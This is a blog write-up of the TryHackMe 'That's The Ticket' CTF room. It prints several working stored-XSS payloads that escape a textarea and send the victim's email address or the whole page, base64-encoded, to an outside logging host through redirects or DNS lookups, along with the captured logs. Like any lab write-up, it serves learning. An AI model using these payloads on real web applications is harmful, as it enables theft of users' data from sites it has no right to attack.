---
layout: post
title:  "THM: That's The Ticket"
date:   2021-06-15 20:00:00 +1000
category: hacking
---

## THM: That's The Ticket
This is [That's The Ticket](https://tryhackme.com/room/thatstheticket) from THM. It's Medium rated and says: 

>IT Support is going to have a really bad day today, but don't think they're stupid! They have really strict firewalls!  
Using the IT support portal try and make your way into the admin account.  
Hint: Our HTTP & DNS Logging tool on http://10.10.10.100 may come in useful!

Based on this, I was guessing this might have been XSS. Guess who doesn't know anything about XSS? This guy. Let's go.

## Ports
SSH, and HTTP only.

## HTTP 
Our first task is to find the email address of IT Support. We can register an account, and then create support tickets. Now when I said I don't know shit about XSS, I wasn't joking. It's obviously not easy to do in CTF-type challenges when you're working with Vulnhub boxes or on THM; they are usually single machine and single user type things. 

Anyway I had once signed up for a course with the [XSS Rat](https://thexssrat.podia.com/courses/uncle-rat-s-xss-guide/) about XSS so I watched the first few videos, learned not quite enough to be dangerous and got started. 

Using a [polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot) that I borrowed, I could get an XSS payload to trigger on the ticket. Then, I tried getting it to send me the email address with this payload:

```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=document.location='http://ea4701396c8c6c7498f319f14dcd1179.log.tryhackme.tech/'+document.getElementById("email").innerHTML;//
```

This would get an HTTP request to the logging tool on 10.10.10.100, but I'd only get my own email address, like so:

{% highlight html %}
We received the following HTTP Request:
----------------------------------------------------------------------------------

GET /me@mine.com HTTP/1.1
Host: d2f2054f87f8c58e2d6a2c6e96a2dbcf.log.tryhackme.tech
Upgrade-Insecure-Requests: 1
Referer: http://10.10.207.176/26
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0


----------------------------------------------------------------------------------
Request received @ 15 Jun 2021 06:52:34 UTC from IP 10.9.10.123
{% endhighlight %}

Next, I tried .... well, different things. I eventually landed on a payload like this:

```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=document.location='http://0cd9893755d681c4eaf2e981188ea1bf.log.tryhackme.tech/'+btoa(unescape(encodeURIComponent(document.documentElement.innerHTML)));//
```

Which would essentially exfil the entire page contents as base64, but it *still* didn't contain the admin's email address. 

Eventually I quit and checked a writeup, because I genuinely didn't know what to to. Specifically I looked [here](https://dasith.works/thats-the-ticket-thm/), not that it probably matters much. I got two things from here: one, we needed to escape a 'textarea', and two, a useful payload. Now as it happens my polyglot was already escaping the textarea but the payload could be much simpler without all the LeEt stuff. The payload:

{% highlight html %}
</textarea> 
<script> 
var email = document.getElementById('email').innerHTML
var emailreplaced1 = email.replace('@','X')
var emailreplaced2 = emailreplaced1.replace('.','Y')
fetch('http://'+emailreplaced2+'.f6dd97cbbca6b33d8f7e673cd79a74e7.log.tryhackme.tech')
</script>
{% endhighlight %}

So why does this work, whereas mine didn't? Because the DNS lookup to the monitor is done by the admin account, but the GET request isn't. We get a result like this:

{% highlight html %}
We received a DNS lookup with type: A for the domain:
adminaccountxitsupportythm.d2f2054f87f8c58e2d6a2c6e96a2dbcf.log.tryhackme.tech

The Lookup was requested @ 15 Jun 2021 07:05:51 UTC from IP 34.242.153.160
{% endhighlight %}

And it looks like this since old mate replaced @ with 'X' and . with Y, so the answer is adminaccount@itsupport.thm 

Now I knew this, I thought the payload could be simplified somewhat. Here's my (slightly) optimised version:

```
</textarea><script>fetch('http://'+(document.getElementById('email').innerText.replace("@", "_AT_"))+'.523c35ab11c776d732b5ce558008fcf3.log.tryhackme.tech')</script>
```

No doubt there are better ones. This works though:

{% highlight html %}
We received a DNS lookup with type: A for the domain:
adminaccount_at_itsupport.thm.523c35ab11c776d732b5ce558008fcf3.log.tryhackme.tech

The Lookup was requested @ 15 Jun 2021 07:18:41 UTC from IP 34.245.205.131
{% endhighlight %}

Once you've got that you just have to bruteforce the admin login; the password is trivial and I used Burp Turbo Intruder and then you just read a flag from a ticket. But I still found this really quite interesting and I definitely learned a few things so cheers adamtlangley.
